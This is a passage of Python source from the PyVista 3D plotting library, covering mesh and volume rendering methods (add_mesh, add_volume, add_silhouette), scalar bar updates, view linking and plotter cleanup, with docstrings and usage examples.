            positive float. Default ``False``.

        pbr : bool, optional
            Enable physics based rendering (PBR) if the mesh is
            ``PolyData``.  Use the ``color`` argument to set the base
            color. This is only available in VTK>=9.

        metallic : float, optional
            Usually this value is either 0 or 1 for a real material
            but any value in between is valid. This parameter is only
            used by PBR interpolation. Default value is 0.0.

        roughness : float, optional
            This value has to be between 0 (glossy) and 1 (rough). A
            glossy material has reflections and a high specular part.
            This parameter is only used by PBR interpolation. Default
            value is 0.5.

        render : bool, optional
            Force a render when ``True``.  Default ``True``.

        component : int, optional
            Set component of vector valued scalars to plot.  Must be
            nonnegative, if supplied. If ``None``, the magnitude of
            the vector is plotted.

        **kwargs : dict, optional
            Optional developer keyword arguments.

        Returns
        -------
        vtk.vtkActor
            VTK actor of the mesh.

        Examples
        --------
        Add a sphere to the plotter and show it with a custom scalar
        bar title.

        >>> import pyvista
        >>> sphere = pyvista.Sphere()
        >>> sphere['Data'] = sphere.points[:, 2]
        >>> plotter = pyvista.Plotter()
        >>> _ = plotter.add_mesh(sphere,
        ...                      scalar_bar_args={'title': 'Z Position'})
        >>> plotter.show()

        Plot using RGB on a single cell.  Note that since the number of
        points and the number of cells are identical, we have to pass
        ``preference='cell'``.

        >>> import pyvista
        >>> import numpy as np
        >>> vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
        >>> faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
        >>> mesh = pyvista.PolyData(vertices, faces)
        >>> mesh.cell_data['colors'] = [[255, 255, 255],
        ...                             [0, 255, 0],
        ...                             [0, 0, 255],
        ...                             [255, 0, 0]]
        >>> plotter = pyvista.Plotter()
        >>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
        ...                      rgb=True, preference='cell')
        >>> plotter.camera_position = 'xy'
        >>> plotter.show()

        Note how this varies from ``preference=='point'``.
This is because each point is now being individually colored, versus in ``preference=='point'``, each cell face is individually colored. >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False, ... rgb=True, preference='point') >>> plotter.camera_position='xy' >>> plotter.show() Plot a plane with a constant color and vary its opacity by point. >>> plane = pyvista.Plane() >>> plane.plot(color='b', opacity=np.linspace(0, 1, plane.n_points), ... show_edges=True) """ self.mapper = make_mapper(_vtk.vtkDataSetMapper) # Convert the VTK data object to a pyvista wrapped object if necessary if not is_pyvista_dataset(mesh): mesh = wrap(mesh) if not is_pyvista_dataset(mesh): raise TypeError( f'Object type ({type(mesh)}) not supported for plotting in PyVista.' ) ##### Parse arguments to be used for all meshes ##### # Avoid mutating input if scalar_bar_args is None: scalar_bar_args = {'n_colors': n_colors} else: scalar_bar_args = scalar_bar_args.copy() if show_edges is None: show_edges = self._theme.show_edges if show_scalar_bar is None: show_scalar_bar = self._theme.show_scalar_bar if lighting is None: lighting = self._theme.lighting if smooth_shading is None: if pbr: smooth_shading = True else: smooth_shading = self._theme.smooth_shading # supported aliases clim = kwargs.pop('rng', clim) cmap = kwargs.pop('colormap', cmap) culling = kwargs.pop("backface_culling", culling) if render_points_as_spheres is None: render_points_as_spheres = self._theme.render_points_as_spheres if name is None: name = f'{type(mesh).__name__}({mesh.memory_address})' nan_color = Color( nan_color, default_opacity=nan_opacity, default_color=self._theme.nan_color ) if color is True: color = self._theme.color if texture is False: texture = None if culling is True: culling = 'backface' rgb = kwargs.pop('rgba', rgb) feature_angle = kwargs.pop('feature_angle', 30) # account for legacy behavior if 'stitle' in kwargs: # pragma: no cover warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning) scalar_bar_args.setdefault('title', kwargs.pop('stitle')) if "scalar" in kwargs: raise TypeError( "`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?" ) assert_empty_kwargs(**kwargs) ##### Handle composite datasets ##### if isinstance(mesh, pyvista.MultiBlock): # first check the scalars if clim is None and scalars is not None: # Get the data range across the array for all blocks # if scalars specified if isinstance(scalars, str): clim = mesh.get_data_range(scalars) else: # TODO: an array was given... how do we deal with # that? Possibly a 2D arrays or list of # arrays where first index corresponds to # the block? This could get complicated real # quick. raise TypeError( 'scalars array must be given as a string name for multiblock datasets.' 
) the_arguments = locals() the_arguments.pop('self') the_arguments.pop('mesh') the_arguments.pop('kwargs') if multi_colors: # Compute unique colors for each index of the block if _has_matplotlib(): from itertools import cycle import matplotlib cycler = matplotlib.rcParams['axes.prop_cycle'] colors = cycle(cycler) else: multi_colors = False logging.warning('Please install matplotlib for color cycles') # Now iteratively plot each element of the multiblock dataset actors = [] for idx in range(mesh.GetNumberOfBlocks()): if mesh[idx] is None: continue # Get a good name to use next_name = f'{name}-{idx}' # Get the data object if not is_pyvista_dataset(mesh[idx]): data = wrap(mesh.GetBlock(idx)) if not is_pyvista_dataset(mesh[idx]): continue # move on if we can't plot it else: data = mesh.GetBlock(idx) if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1): # Note that a block can exist but be None type # or it could have zeros points (be empty) after filtering continue # Now check that scalars is available for this dataset if isinstance(data, _vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None: ts = None else: ts = scalars if multi_colors: color = next(colors)['color'] ## Add to the scene the_arguments['color'] = color the_arguments['scalars'] = ts the_arguments['name'] = next_name the_arguments['texture'] = None a = self.add_mesh(data, **the_arguments) actors.append(a) if (reset_camera is None and not self.camera_set) or reset_camera: cpos = self.get_default_cam_pos() self.camera_position = cpos self.camera_set = False self.reset_camera() return actors ##### Plot a single PyVista mesh ##### if silhouette: if isinstance(silhouette, dict): self.add_silhouette(mesh, silhouette) else: self.add_silhouette(mesh) # Try to plot something if no preference given if scalars is None and color is None and texture is None: # Prefer texture first if len(list(mesh.textures.keys())) > 0: texture = True # If no texture, plot any active scalar else: # Make sure scalars components are not vectors/tuples scalars = mesh.active_scalars_name # Don't allow plotting of string arrays by default if scalars is not None: # and np.issubdtype(mesh.active_scalars.dtype, np.number): scalar_bar_args.setdefault('title', scalars) else: scalars = None # Make sure scalars is a numpy array after this point original_scalar_name = None if isinstance(scalars, str): self.mapper.SetArrayName(scalars) # enable rgb if the scalars name ends with rgb or rgba if rgb is None: if scalars.endswith('_rgb') or scalars.endswith('_rgba'): rgb = True original_scalar_name = scalars scalars = get_array(mesh, scalars, preference=preference, err=True) scalar_bar_args.setdefault('title', original_scalar_name) # Compute surface normals if using smooth shading if smooth_shading: mesh, scalars = prepare_smooth_shading( mesh, scalars, texture, split_sharp_edges, feature_angle, preference ) if mesh.n_points < 1: raise ValueError('Empty meshes cannot be plotted. 
Input mesh has zero points.') # set main values self.mesh = mesh self.mapper.SetInputData(self.mesh) self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors) if interpolate_before_map: self.mapper.InterpolateScalarsBeforeMappingOn() actor = _vtk.vtkActor() prop = _vtk.vtkProperty() actor.SetMapper(self.mapper) actor.SetProperty(prop) if texture is True or isinstance(texture, (str, int)): texture = mesh._activate_texture(texture) if texture: if isinstance(texture, np.ndarray): texture = numpy_to_texture(texture) if not isinstance(texture, (_vtk.vtkTexture, _vtk.vtkOpenGLTexture)): raise TypeError(f'Invalid texture type ({type(texture)})') if mesh.GetPointData().GetTCoords() is None: raise ValueError( 'Input mesh does not have texture coordinates to support the texture.' ) actor.SetTexture(texture) # Set color to white by default when using a texture if color is None: color = 'white' if scalars is None: show_scalar_bar = False self.mapper.SetScalarModeToUsePointFieldData() # see https://github.com/pyvista/pyvista/issues/950 mesh.set_active_scalars(None) # Handle making opacity array custom_opac, opacity = process_opacity( mesh, opacity, preference, n_colors, scalars, use_transparency ) # Scalars formatting ================================================== if scalars is not None: show_scalar_bar, n_colors, clim = self.mapper.set_scalars( mesh, scalars, scalar_bar_args, rgb, component, preference, interpolate_before_map, custom_opac, annotations, log_scale, nan_color, above_color, below_color, cmap, flip_scalars, opacity, categories, n_colors, clim, self._theme, show_scalar_bar, ) elif custom_opac: # no scalars but custom opacity self.mapper.set_custom_opacity( opacity, color, mesh, n_colors, preference, interpolate_before_map, rgb, self._theme, ) else: self.mapper.SetScalarModeToUseFieldData() # Set actor properties ================================================ # select view style if not style: style = 'surface' style = style.lower() if style == 'wireframe': prop.SetRepresentationToWireframe() if color is None: color = self._theme.outline_color elif style == 'points': prop.SetRepresentationToPoints() elif style == 'surface': prop.SetRepresentationToSurface() else: raise ValueError( 'Invalid style. 
Must be one of the following:\n' '\t"surface"\n' '\t"wireframe"\n' '\t"points"\n' ) prop.SetPointSize(point_size) prop.SetAmbient(ambient) prop.SetDiffuse(diffuse) prop.SetSpecular(specular) prop.SetSpecularPower(specular_power) if pbr: if not _vtk.VTK9: # pragma: no cover raise RuntimeError('Physically based rendering requires VTK 9 ' 'or newer') prop.SetInterpolationToPBR() prop.SetMetallic(metallic) prop.SetRoughness(roughness) elif smooth_shading: prop.SetInterpolationToPhong() else: prop.SetInterpolationToFlat() # edge display style if show_edges: prop.EdgeVisibilityOn() rgb_color = Color(color, default_color=self._theme.color) prop.SetColor(rgb_color.float_rgb) if isinstance(opacity, (float, int)): prop.SetOpacity(opacity) prop.SetEdgeColor(Color(edge_color, default_color=self._theme.edge_color).float_rgb) if render_points_as_spheres: prop.SetRenderPointsAsSpheres(render_points_as_spheres) if render_lines_as_tubes: prop.SetRenderLinesAsTubes(render_lines_as_tubes) # legend label if label: if not isinstance(label, str): raise TypeError('Label must be a string') geom = pyvista.Triangle() if scalars is not None: geom = pyvista.Box() rgb_color = Color('black') geom.points -= geom.center addr = actor.GetAddressAsString("") self.renderer._labels[addr] = [geom, label, rgb_color] # lighting display style if not lighting: prop.LightingOff() # set line thickness if line_width: prop.SetLineWidth(line_width) self.add_actor( actor, reset_camera=reset_camera, name=name, culling=culling, pickable=pickable, render=render, ) # hide scalar bar if using special scalars if scalar_bar_args.get('title') == '__custom_rgba': show_scalar_bar = False # Only show scalar bar if there are scalars if show_scalar_bar and scalars is not None: self.add_scalar_bar(**scalar_bar_args) self.renderer.Modified() return actor def add_volume( self, volume, scalars=None, clim=None, resolution=None, opacity='linear', n_colors=256, cmap=None, flip_scalars=False, reset_camera=None, name=None, ambient=0.0, categories=False, culling=False, multi_colors=False, blending='composite', mapper=None, scalar_bar_args=None, show_scalar_bar=None, annotations=None, pickable=True, preference="point", opacity_unit_distance=None, shade=False, diffuse=0.7, specular=0.2, specular_power=10.0, render=True, **kwargs, ): """Add a volume, rendered using a smart mapper by default. Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`. Parameters ---------- volume : 3D numpy.ndarray or pyvista.UniformGrid The input volume to visualize. 3D numpy arrays are accepted. scalars : str or numpy.ndarray, optional Scalars used to "color" the mesh. Accepts a string name of an array that is present on the mesh or an array equal to the number of cells or the number of points in the mesh. Array should be sized as a single vector. If ``scalars`` is ``None``, then the active scalars are used. clim : 2 item list, optional Color bar range for scalars. Defaults to minimum and maximum of scalars array. Example: ``[-1, 2]``. ``rng`` is also an accepted alias for this. resolution : list, optional Block resolution. opacity : str or numpy.ndarray, optional Opacity mapping for the scalars array. A string can also be specified to map the scalars range to a predefined opacity transfer function (options include: 'linear', 'linear_r', 'geom', 'geom_r'). Or you can pass a custom made transfer function that is an array either ``n_colors`` in length or shorter. n_colors : int, optional Number of colors to use when displaying scalars. Defaults to 256. 
The scalar bar will also have this many colors. cmap : str, optional Name of the Matplotlib colormap to us when mapping the ``scalars``. See available Matplotlib colormaps. Only applicable for when displaying ``scalars``. Requires Matplotlib to be installed. ``colormap`` is also an accepted alias for this. If ``colorcet`` or ``cmocean`` are installed, their colormaps can be specified by name. flip_scalars : bool, optional Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do this as well. reset_camera : bool, optional Reset the camera after adding this mesh to the scene. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. ambient : float, optional When lighting is enabled, this is the amount of light from 0 to 1 that reaches the actor when not directed at the light source emitted from the viewer. Default 0.0. categories : bool, optional If set to ``True``, then the number of unique values in the scalar array will be used as the ``n_colors`` argument. culling : str, optional Does not render faces that are culled. Options are ``'front'`` or ``'back'``. This can be helpful for dense surface meshes, especially when edges are visible, but can cause flat meshes to be partially displayed. Defaults ``False``. multi_colors : bool, optional Whether or not to use multiple colors when plotting MultiBlock object. Blocks will be colored sequentially as 'Reds', 'Greens', 'Blues', and 'Grays'. blending : str, optional Blending mode for visualisation of the input object(s). Can be one of 'additive', 'maximum', 'minimum', 'composite', or 'average'. Defaults to 'additive'. mapper : str, optional Volume mapper to use given by name. Options include: ``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``. If ``None`` the ``"volume_mapper"`` in the ``self._theme`` is used. scalar_bar_args : dict, optional Dictionary of keyword arguments to pass when adding the scalar bar to the scene. For options, see :func:`pyvista.BasePlotter.add_scalar_bar`. show_scalar_bar : bool If ``False``, a scalar bar will not be added to the scene. Defaults to ``True``. annotations : dict, optional Pass a dictionary of annotations. Keys are the float values in the scalars range to annotate on the scalar bar and the values are the the string annotations. pickable : bool, optional Set whether this mesh is pickable. preference : str, optional When ``mesh.n_points == mesh.n_cells`` and setting scalars, this parameter sets how the scalars will be mapped to the mesh. Default ``'points'``, causes the scalars will be associated with the mesh points. Can be either ``'points'`` or ``'cells'``. opacity_unit_distance : float Set/Get the unit distance on which the scalar opacity transfer function is defined. Meaning that over that distance, a given opacity (from the transfer function) is accumulated. This is adjusted for the actual sampling distance during rendering. By default, this is the length of the diagonal of the bounding box of the volume divided by the dimensions. shade : bool Default off. If shading is turned on, the mapper may perform shading calculations - in some cases shading does not apply (for example, in a maximum intensity projection) and therefore shading will not be performed even if this flag is on. diffuse : float, optional The diffuse lighting coefficient. Default ``1.0``. specular : float, optional The specular lighting coefficient. Default ``0.0``. 
specular_power : float, optional The specular power. Between ``0.0`` and ``128.0``. render : bool, optional Force a render when True. Default ``True``. **kwargs : dict, optional Optional keyword arguments. Returns ------- vtk.vtkActor VTK actor of the volume. Examples -------- Show a built-in volume example with the coolwarm colormap. >>> from pyvista import examples >>> import pyvista as pv >>> bolt_nut = examples.download_bolt_nut() >>> pl = pv.Plotter() >>> _ = pl.add_volume(bolt_nut, cmap="coolwarm") >>> pl.show() """ # Handle default arguments # Supported aliases clim = kwargs.pop('rng', clim) cmap = kwargs.pop('colormap', cmap) culling = kwargs.pop("backface_culling", culling) if "scalar" in kwargs: raise TypeError( "`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?" ) assert_empty_kwargs(**kwargs) # Avoid mutating input if scalar_bar_args is None: scalar_bar_args = {} else: scalar_bar_args = scalar_bar_args.copy() # account for legacy behavior if 'stitle' in kwargs: # pragma: no cover warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning) scalar_bar_args.setdefault('title', kwargs.pop('stitle')) if show_scalar_bar is None: show_scalar_bar = self._theme.show_scalar_bar if culling is True: culling = 'backface' if mapper is None: mapper = self._theme.volume_mapper # only render when the plotter has already been shown if render is None: render = not self._first_time # Convert the VTK data object to a pyvista wrapped object if necessary if not is_pyvista_dataset(volume): if isinstance(volume, np.ndarray): volume = wrap(volume) if resolution is None: resolution = [1, 1, 1] elif len(resolution) != 3: raise ValueError('Invalid resolution dimensions.') volume.spacing = resolution else: volume = wrap(volume) if not is_pyvista_dataset(volume): raise TypeError( f'Object type ({type(volume)}) not supported for plotting in PyVista.' ) else: # HACK: Make a copy so the original object is not altered. # Also, place all data on the nodes as issues arise when # volume rendering on the cells. volume = volume.cell_data_to_point_data() if name is None: name = f'{type(volume).__name__}({volume.memory_address})' if isinstance(volume, pyvista.MultiBlock): from itertools import cycle cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples']) # Now iteratively plot each element of the multiblock dataset actors = [] for idx in range(volume.GetNumberOfBlocks()): if volume[idx] is None: continue # Get a good name to use next_name = f'{name}-{idx}' # Get the data object block = wrap(volume.GetBlock(idx)) if resolution is None: try: block_resolution = block.GetSpacing() except AttributeError: block_resolution = resolution else: block_resolution = resolution if multi_colors: color = next(cycler) else: color = cmap a = self.add_volume( block, resolution=block_resolution, opacity=opacity, n_colors=n_colors, cmap=color, flip_scalars=flip_scalars, reset_camera=reset_camera, name=next_name, ambient=ambient, categories=categories, culling=culling, clim=clim, mapper=mapper, pickable=pickable, opacity_unit_distance=opacity_unit_distance, shade=shade, diffuse=diffuse, specular=specular, specular_power=specular_power, render=render, ) actors.append(a) return actors if not isinstance(volume, pyvista.UniformGrid): raise TypeError( f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.' 
) if opacity_unit_distance is None: opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1) if scalars is None: # Make sure scalars components are not vectors/tuples scalars = volume.active_scalars # Don't allow plotting of string arrays by default if scalars is not None and np.issubdtype(scalars.dtype, np.number): scalar_bar_args.setdefault('title', volume.active_scalars_info[1]) else: raise ValueError('No scalars to use for volume rendering.') elif isinstance(scalars, str): pass ############## title = 'Data' if isinstance(scalars, str): title = scalars scalars = get_array(volume, scalars, preference=preference, err=True) scalar_bar_args.setdefault('title', title) if not isinstance(scalars, np.ndarray): scalars = np.asarray(scalars) if not np.issubdtype(scalars.dtype, np.number): raise TypeError('Non-numeric scalars are currently not supported for volume rendering.') if scalars.ndim != 1: scalars = scalars.ravel() if scalars.dtype == np.bool_ or scalars.dtype == np.uint8: scalars = scalars.astype(np.float_) # Define mapper, volume, and add the correct properties mappers = { 'fixed_point': _vtk.vtkFixedPointVolumeRayCastMapper, 'gpu': _vtk.vtkGPUVolumeRayCastMapper, 'open_gl': _vtk.vtkOpenGLGPUVolumeRayCastMapper, 'smart': _vtk.vtkSmartVolumeMapper, } if not isinstance(mapper, str) or mapper not in mappers.keys(): raise TypeError( f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}" ) self.mapper = make_mapper(mappers[mapper]) # Scalars interpolation approach if scalars.shape[0] == volume.n_points: volume.point_data.set_array(scalars, title, True) self.mapper.SetScalarModeToUsePointData() elif scalars.shape[0] == volume.n_cells: volume.cell_data.set_array(scalars, title, True) self.mapper.SetScalarModeToUseCellData() else: raise_not_matching(scalars, volume) # Set scalars range if clim is None: clim = [np.nanmin(scalars), np.nanmax(scalars)] elif isinstance(clim, float) or isinstance(clim, int): clim = [-clim, clim] ############### scalars = scalars.astype(np.float_) with np.errstate(invalid='ignore'): idxs0 = scalars < clim[0] idxs1 = scalars > clim[1] scalars[idxs0] = clim[0] scalars[idxs1] = clim[1] scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255 # scalars = scalars.astype(np.uint8) volume[title] = scalars self.mapper.scalar_range = clim # Set colormap and build lookup table table = _vtk.vtkLookupTable() # table.SetNanColor(nan_color) # NaN's are chopped out with current implementation # above/below colors not supported with volume rendering if isinstance(annotations, dict): for val, anno in annotations.items(): table.SetAnnotation(float(val), str(anno)) if cmap is None: # Set default map if matplotlib is available if _has_matplotlib(): cmap = self._theme.cmap if cmap is not None: if not _has_matplotlib(): raise ImportError('Please install matplotlib for volume rendering.') cmap = get_cmap_safe(cmap) if categories: if categories is True: n_colors = len(np.unique(scalars)) elif isinstance(categories, int): n_colors = categories if flip_scalars: cmap = cmap.reversed() color_tf = _vtk.vtkColorTransferFunction() for ii in range(n_colors): color_tf.AddRGBPoint(ii, *cmap(ii)[:-1]) # Set opacities if isinstance(opacity, (float, int)): opacity_values = [opacity] * n_colors elif isinstance(opacity, str): opacity_values = pyvista.opacity_transfer_function(opacity, n_colors) elif isinstance(opacity, (np.ndarray, list, tuple)): opacity = np.array(opacity) opacity_values = 
opacity_transfer_function(opacity, n_colors) opacity_tf = _vtk.vtkPiecewiseFunction() for ii in range(n_colors): opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors) # Now put color tf and opacity tf into a lookup table for the scalar bar table.SetNumberOfTableValues(n_colors) lut = cmap(np.array(range(n_colors))) * 255 lut[:, 3] = opacity_values lut = lut.astype(np.uint8) table.SetTable(_vtk.numpy_to_vtk(lut)) table.SetRange(*clim) self.mapper.lookup_table = table self.mapper.SetInputData(volume) blending = blending.lower() if blending in ['additive', 'add', 'sum']: self.mapper.SetBlendModeToAdditive() elif blending in ['average', 'avg', 'average_intensity']: self.mapper.SetBlendModeToAverageIntensity() elif blending in ['composite', 'comp']: self.mapper.SetBlendModeToComposite() elif blending in ['maximum', 'max', 'maximum_intensity']: self.mapper.SetBlendModeToMaximumIntensity() elif blending in ['minimum', 'min', 'minimum_intensity']: self.mapper.SetBlendModeToMinimumIntensity() else: raise ValueError( f'Blending mode {blending!r} invalid. ' 'Please choose one of "additive", ' '"composite", "minimum" or "maximum".' ) self.mapper.Update() self.volume = _vtk.vtkVolume() self.volume.SetMapper(self.mapper) prop = _vtk.vtkVolumeProperty() prop.SetColor(color_tf) prop.SetScalarOpacity(opacity_tf) prop.SetAmbient(ambient) prop.SetScalarOpacityUnitDistance(opacity_unit_distance) prop.SetShade(shade) prop.SetDiffuse(diffuse) prop.SetSpecular(specular) prop.SetSpecularPower(specular_power) self.volume.SetProperty(prop) actor, prop = self.add_actor( self.volume, reset_camera=reset_camera, name=name, culling=culling, pickable=pickable, render=render, ) # Add scalar bar if scalars are available if show_scalar_bar and scalars is not None: self.add_scalar_bar(**scalar_bar_args) self.renderer.Modified() return actor def add_silhouette(self, mesh, params=None): """Add a silhouette of a PyVista or VTK dataset to the scene. A silhouette can also be generated directly in :func:`add_mesh <pyvista.Plotter.add_mesh>`. See also :ref:`silhouette_example`. Parameters ---------- mesh : pyvista.PolyData Mesh for generating silhouette to plot. params : dict, optional * If not supplied, the default theme values will be used. * ``color``: ``color_like``, color of the silhouette * ``line_width``: ``float``, edge width * ``opacity``: ``float`` between 0 and 1, edge transparency * ``feature_angle``: If a ``float``, display sharp edges exceeding that angle in degrees. * ``decimate``: ``float`` between 0 and 1, level of decimation Returns ------- vtk.vtkActor VTK actor of the silhouette. Examples -------- >>> import pyvista >>> from pyvista import examples >>> bunny = examples.download_bunny() >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(bunny, color='tan') >>> _ = plotter.add_silhouette(bunny, ... 
params={'color': 'red', 'line_width': 8.0}) >>> plotter.view_xy() >>> plotter.show() """ silhouette_params = self._theme.silhouette.to_dict() if params: silhouette_params.update(params) if not is_pyvista_dataset(mesh): mesh = wrap(mesh) if not isinstance(mesh, pyvista.PolyData): raise TypeError(f"Expected type is `PolyData` but {type(mesh)} was given.") if isinstance(silhouette_params["decimate"], float): silhouette_mesh = mesh.decimate(silhouette_params["decimate"]) else: silhouette_mesh = mesh alg = _vtk.vtkPolyDataSilhouette() alg.SetInputData(silhouette_mesh) alg.SetCamera(self.renderer.camera) if silhouette_params["feature_angle"] is not None: alg.SetEnableFeatureAngle(True) alg.SetFeatureAngle(silhouette_params["feature_angle"]) else: alg.SetEnableFeatureAngle(False) mapper = make_mapper(_vtk.vtkDataSetMapper) mapper.SetInputConnection(alg.GetOutputPort()) actor, prop = self.add_actor(mapper) prop.SetColor(Color(silhouette_params["color"]).float_rgb) prop.SetOpacity(silhouette_params["opacity"]) prop.SetLineWidth(silhouette_params["line_width"]) return actor def update_scalar_bar_range(self, clim, name=None): """Update the value range of the active or named scalar bar. Parameters ---------- clim : sequence The new range of scalar bar. Two item list (e.g. ``[-1, 2]``). name : str, optional The title of the scalar bar to update. """ if isinstance(clim, float) or isinstance(clim, int): clim = [-clim, clim] if len(clim) != 2: raise TypeError('clim argument must be a length 2 iterable of values: (min, max).') if name is None: if not hasattr(self, 'mapper'): raise AttributeError('This plotter does not have an active mapper.') self.mapper.scalar_range = clim return # Use the name to find the desired actor def update_mapper(mapper_helper): mapper_helper.scalar_range = clim return try: for mh in self._scalar_bar_mappers[name]: update_mapper(mh) except KeyError: raise KeyError('Name ({}) not valid/not found in this plotter.') return def clear(self): """Clear plot by removing all actors and properties. Examples -------- >>> import pyvista >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(pyvista.Sphere()) >>> plotter.clear() >>> plotter.renderer.actors {} """ self.renderers.clear() self.scalar_bars.clear() self.mesh = None def link_views(self, views=0): """Link the views' cameras. Parameters ---------- views : int | tuple or list If ``views`` is int, link the views to the given view index or if ``views`` is a tuple or a list, link the given views cameras. """ if isinstance(views, (int, np.integer)): for renderer in self.renderers: renderer.camera = self.renderers[views].camera return views = np.asarray(views) if np.issubdtype(views.dtype, np.integer): for view_index in views: self.renderers[view_index].camera = self.renderers[views[0]].camera else: raise TypeError(f'Expected type is int, list or tuple: {type(views)} is given') def unlink_views(self, views=None): """Unlink the views' cameras. Parameters ---------- views : None, int, tuple or list If ``views`` is None unlink all the views, if ``views`` is int unlink the selected view's camera or if ``views`` is a tuple or a list, unlink the given views cameras. 
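
        Examples
        --------
        A minimal sketch, assuming a two-subplot plotter: link both
        subplot cameras to the first renderer, then unlink them again.

        >>> import pyvista
        >>> pl = pyvista.Plotter(shape=(1, 2))
        >>> pl.link_views()
        >>> pl.unlink_views()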
""" if views is None: for renderer in self.renderers: renderer.camera = Camera() renderer.reset_camera() elif isinstance(views, int): self.renderers[views].camera = Camera() self.renderers[views].reset_camera() elif isinstance(views, collections.abc.Iterable): for view_index in views: self.renderers[view_index].camera = Camera() self.renderers[view_index].reset_camera() else: raise TypeError(f'Expected type is None, int, list or tuple: {type(views)} is given') @wraps(ScalarBars.add_scalar_bar) def add_scalar_bar(self, *args, **kwargs): """Wrap for ``ScalarBars.add_scalar_bar``.""" # only render when the plotter has already been shown render = kwargs.get('render', None) if render is None: kwargs['render'] = not self._first_time # check if maper exists mapper = kwargs.get('mapper', None) if mapper is None: if not hasattr(self, 'mapper') or self.mapper is None: raise AttributeError('Mapper does not exist. Add a mesh with scalars first.') kwargs['mapper'] = self.mapper # title can be the first and only arg if len(args): title = args[0] else: title = kwargs.get('title', '') if title is None: title = '' kwargs['title'] = title interactive = kwargs.get('interactive', None) if interactive is None: interactive = self._theme.interactive if self.shape != (1, 1): interactive = False elif interactive and self.shape != (1, 1): raise ValueError('Interactive scalar bars disabled for multi-renderer plots') # by default, use the plotter local theme kwargs.setdefault('theme', self._theme) return self.scalar_bars.add_scalar_bar(**kwargs) def update_scalars(self, scalars, mesh=None, render=True): """Update scalars of an object in the plotter. Parameters ---------- scalars : np.ndarray Scalars to replace existing scalars. mesh : vtk.PolyData or vtk.UnstructuredGrid, optional Object that has already been added to the Plotter. If None, uses last added mesh. render : bool, optional Force a render when True. Default ``True``. """ if mesh is None: mesh = self.mesh if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)): # Recursive if need to update scalars on many meshes for m in mesh: self.update_scalars(scalars, mesh=m, render=False) if render: self.render() return if isinstance(scalars, str): # Grab scalars array if name given scalars = get_array(mesh, scalars) if scalars is None: if render: self.render() return if scalars.shape[0] == mesh.GetNumberOfPoints(): data = mesh.GetPointData() elif scalars.shape[0] == mesh.GetNumberOfCells(): data = mesh.GetCellData() else: raise_not_matching(scalars, mesh) vtk_scalars = data.GetScalars() if vtk_scalars is None: raise ValueError('No active scalars') s = convert_array(vtk_scalars) s[:] = scalars data.Modified() try: # Why are the points updated here? Not all datasets have points # and only the scalars array is modified by this function... mesh.GetPoints().Modified() except: pass if render: self.render() def update_coordinates(self, points, mesh=None, render=True): """Update the points of an object in the plotter. Parameters ---------- points : np.ndarray Points to replace existing points. mesh : vtk.PolyData or vtk.UnstructuredGrid, optional Object that has already been added to the Plotter. If None, uses last added mesh. render : bool, optional Force a render when True. Default ``True``. 
""" if mesh is None: mesh = self.mesh mesh.points = points # only render when the plotter has already been shown if render is None: render = not self._first_time if render: self.render() def _clear_ren_win(self): """Clear the render window.""" if hasattr(self, 'ren_win'): self.ren_win.Finalize() del self.ren_win def close(self, render=False): """Close the render window. Parameters ---------- render : bool Unused argument. """ # optionally run just prior to exiting the plotter if self._before_close_callback is not None: self._before_close_callback(self) self._before_close_callback = None # must close out widgets first super().close() # Renderer has an axes widget, so close it self.renderers.close() self.renderers.remove_all_lights() # Grab screenshots of last render if self._store_image: self.last_image = self.screenshot(None, return_img=True) self.last_image_depth = self.get_image_depth() # reset scalar bars self.clear() # grab the display id before clearing the window # this is an experimental feature if KILL_DISPLAY: # pragma: no cover disp_id = None if hasattr(self, 'ren_win'): disp_id = self.ren_win.GetGenericDisplayId() self._clear_ren_win() if self.iren is not None: self.iren.remove_observers() self.iren.terminate_app() if KILL_DISPLAY: # pragma: no cover _kill_display(disp_id) self.iren = None if hasattr(self, 'textActor'): del self.textActor # end movie if hasattr(self, 'mwriter'): try: self.mwriter.close() except BaseException: pass # this helps managing closed plotters self._closed = True def deep_clean(self): """Clean the plotter of the memory.""" if hasattr(self, 'renderers'): self.renderers.deep_clean() if getattr(self, 'mesh', None) is not None: self.mesh.point_data = None self.mesh.cell_data = None self.mesh = None if getattr(self, 'mapper', None) is not None: self.mapper.lookup_table = None self.mapper = None self.volume = None self.textActor = None def add_text( self, text, position='upper_left', font_size=18, color=None, font=None, shadow=False, name=None, viewport=False, *, render=True, ): """Add text to plot object in the top left corner by default. Parameters ---------- text : str The text to add the rendering. position : str, tuple(float), optional Position to place the bottom left corner of the text box. If tuple is used, the position of the text uses the pixel coordinate system (default). In this case, it returns a more general `vtkOpenGLTextActor`. If string name is used, it returns a `vtkCornerAnnotation` object normally used for fixed labels (like title or xlabel). Default is to find the top left corner of the rendering window and place text box up there. Available position: ``'lower_left'``, ``'lower_right'``, ``'upper_left'``, ``'upper_right'``, ``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and ``'left_edge'``. font_size : float, optional Sets the size of the title font. Defaults to 18. color : color_like, 